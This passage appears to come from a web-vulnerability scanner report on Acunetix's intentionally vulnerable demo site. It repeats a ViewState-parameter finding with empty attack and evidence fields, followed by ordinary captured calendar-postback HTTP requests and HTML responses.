style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8194&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAt9ThSNoIZGRkEpZ4YjTC9WIDSop3a%2FaLZFkejuY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLFicGqAQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w96ltZ%2FT9zC0Pzscc9c%2Bc3Uts%2BaWw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:31 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAt9ThSNoIZGRkEpZ4YjTC9WIDSop3a/aLZFkejuY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLFicGqAQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w96ltZ/T9zC0Pzscc9c+c3Uts+aWw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:White" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8198&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAXn4GTNoIZGRkAKEOKZ1gcFOkA%2FjMDP2OOoFmblM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrm5OMAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9H3Rf01sWOCmPgktzzu2RgUNVj9w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:10 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAXn4GTNoIZGRkAKEOKZ1gcFOkA/jMDP2OOoFmblM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrm5OMAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9H3Rf01sWOCmPgktzzu2RgUNVj9w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:White" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 